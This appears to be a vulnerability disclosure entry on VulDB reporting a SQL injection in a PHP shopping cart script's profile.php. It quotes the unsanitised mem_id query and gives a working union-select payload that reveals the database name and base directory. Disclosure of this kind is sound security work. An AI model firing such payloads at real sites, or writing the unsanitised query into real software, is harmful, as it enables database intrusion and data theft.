| Title | The simple and beautiful PHP shopping cart system has a SQL injection vulnerability. |
|---|
| Description | The simple and beautiful PHP shopping cart system has a SQL injection vulnerability.
Vulnerability file location: / mkshop / Men / profile.php
look at this source code
```
$id =$_ GET['mem_id'];
password='$password' WHERE mem_ id = '$id' ")or die(mysqli_error());
```
The $ID is not protected here. Malicious data can be constructed here to attack the website database.
The construction statement is as follows
```
? mem_ id=0' union select 1,database(),3,@@basedir,5,6,7,8--+
```
https://s1.ax1x.com/2022/08/14/vUSruD.png
Source link
https://www.sourcecodester.com/php/12579/simple-and-nice-shopping-cart-script.html |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/12579/simple-and-nice-shopping-cart-script.html |
|---|
| User | qidian (UID 30810) |
|---|
| Submission | 08/22/2022 14:12 (4 years ago) |
|---|
| Moderation | 08/23/2022 10:38 (20 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 207001 [SourceCodester Simple and Nice Shopping Cart Script /mkshop/Men/profile.php mem_id sql injection] |
|---|
| Points | 20 |
|---|